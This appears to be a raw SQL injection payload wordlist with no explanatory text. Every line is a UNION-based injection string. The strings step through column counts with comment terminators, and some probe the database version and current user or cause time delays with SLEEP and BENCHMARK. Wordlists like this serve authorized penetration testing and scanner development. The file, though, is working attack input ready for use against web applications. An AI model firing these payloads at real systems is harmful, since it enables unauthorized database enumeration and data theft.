UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2--
UNION ALL SELECT 'INJ'||'ECT'||'XXX'--
UNION ALL SELECT 1
UNION ALL SELECT 1#
UNION ALL SELECT 1,2
UNION ALL SELECT 1,2#
UNION ALL SELECT 1,2,3
UNION ALL SELECT 1,2,3#
UNION ALL SELECT 1,2,3,4
UNION ALL SELECT 1,2,3,4#
UNION ALL SELECT 1,2,3,4,5
UNION ALL SELECT 1,2,3,4,5#
UNION ALL SELECT 1,2,3,4,5,6
UNION ALL SELECT 1,2,3,4,5,6#
UNION ALL SELECT 1,2,3,4,5,6,7
UNION ALL SELECT 1,2,3,4,5,6,7#
UNION ALL SELECT 1,2,3,4,5,6,7,8
UNION ALL SELECT 1,2,3,4,5,6,7,8#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9
UNION ALL SELECT 1,2,3,4,5,6,7,8,9#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9--
UNION ALL SELECT 1,2,3,4,5,6,7,8--
UNION ALL SELECT 1,2,3,4,5,6,7--
UNION ALL SELECT 1,2,3,4,5,6--
UNION ALL SELECT 1,2,3,4,5--
UNION ALL SELECT 1,2,3,4--
UNION ALL SELECT 1,2,3--
UNION ALL SELECT 1,2--
UNION ALL SELECT 1--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A'))--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5)--
UNION ALL SELECT CHAR(113)+CHAR(106)+CHAR(122)+CHAR(106)+CHAR(113)+CHAR(110)+CHAR(106)+CHAR(99)+CHAR(73)+CHAR(66)+CHAR(109)+CHAR(119)+CHAR(81)+CHAR(108)+CHAR(88)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113),NULL--
UNION ALL SELECT NULL
UNION ALL SELECT NULL#
UNION ALL SELECT NULL--
UNION ALL SELECT SLEEP(5)--
UNION ALL SELECT USER(),SLEEP(5)--
UNION ALL SELECT USER()--
UNION SELECT
UNION SELECT @@VERSION,SLEEP(5),"'3
UNION SELECT @@VERSION,SLEEP(5),"'3'"#
UNION SELECT @@VERSION,SLEEP(5),3
UNION SELECT @@VERSION,SLEEP(5),USER(),4
UNION SELECT @@VERSION,SLEEP(5),USER(),4#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
